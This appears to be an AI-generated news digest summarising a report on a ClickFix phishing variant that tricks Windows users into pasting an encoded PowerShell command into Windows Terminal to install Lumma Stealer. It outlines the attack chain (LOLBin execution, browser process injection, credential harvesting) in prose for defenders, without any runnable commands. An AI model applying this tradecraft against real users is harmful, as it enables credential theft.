ClickFix Shifts to Windows Terminal Evasion

Post LinkedIn

🖥️Read original on Computerworld

#phishing #clickfix #lolbin #defense-evasionwindows-terminal

💡Phishing evades Defender/training via Terminal—protect Windows AI workstations.

⚡ 30-Second TL;DR

What Changed

Attackers direct Win+X → I to launch wt.exe instead of Win+R Run

Why It Matters

This evasion boosts phishing success against Windows users, risking data in AI dev environments. Enterprises must update training beyond Run dialog warnings. Heightens urgency for endpoint detection refinements.

What To Do Next

Update security training to block pasting commands in Windows Terminal on dev machines.

Who should care:Enterprise & Security Teams

🧠 Deep Insight

Web-grounded analysis with 7 cited sources.

🔑 Enhanced Key Takeaways

•The Windows Terminal variant deploys Lumma Stealer via QueueUserAPC() injection into chrome.exe and msedge.exe processes to harvest browser credentials like Web Data and Login Data.[1][2]
•A parallel attack chain downloads a batch script to AppData\Local, writes VBScript to %TEMP%, and leverages MSBuild as a LOLBin for execution.[1]
•ClickFix campaign originated in 2024 as social engineering tricking users into pasting commands via Run dialog, malvertising, and fake CAPTCHAs, evolving to evade multi-line warnings.[5][6]

🛠️ Technical Deep Dive

•Hex-encoded, XOR-compressed PowerShell command pasted into wt.exe spawns additional Terminal/PowerShell instances for decoding, ZIP download, and renamed 7-Zip extraction.[1]
•Final payload in C:\ProgramData\app_config\ctjb uses QueueUserAPC() for process injection into browsers, targeting high-value artifacts for exfiltration.[2]
•Alternative pathway employs reflective PE loading, API hashing, position-independent shellcode, and PE downloader for memory-only execution to bypass file-based detections.[3]

🔮 Future ImplicationsAI analysis grounded in cited sources

Defender detections for wt.exe abuse will increase by Q2 2026

Microsoft's February 2026 disclosure enables rapid signature updates, as seen in prior ClickFix variants leading to quick mitigations.[1][4]

ClickFix will shift to new LOLBins like finger.exe

January 2026 CrashFix variant already abused finger.exe, indicating attackers adapt to Terminal-focused defenses.[4]

⏳ Timeline

2024-11

Proofpoint reports ClickFix social engineering flooding threat landscape via Run dialog and PowerShell.[6]

2025-08

Microsoft analyzes ClickFix technique using fake CAPTCHAs and Windows Run/Terminal for command execution.[5]

2026-01

Microsoft identifies CrashFix variant crashing browsers and abusing finger.exe for Python RAT deployment.[4]

2026-02

Microsoft uncovers Windows Terminal (Win+X→I) variant delivering Lumma Stealer via 7-Zip and process injection.[1][2]

2026-03

Computerworld publishes on ClickFix shift to Windows Terminal evasion with hex-encoded PowerShell chains.

📎 Sources (7)

Factual claims are grounded in the sources below. Forward-looking analysis is AI-generated interpretation.

🖥️Read original article on Computerworld

📰

Weekly AI Recap

Read this week's curated digest of top AI events →

👉Related Updates

Same topic

Explore #phishing

Same product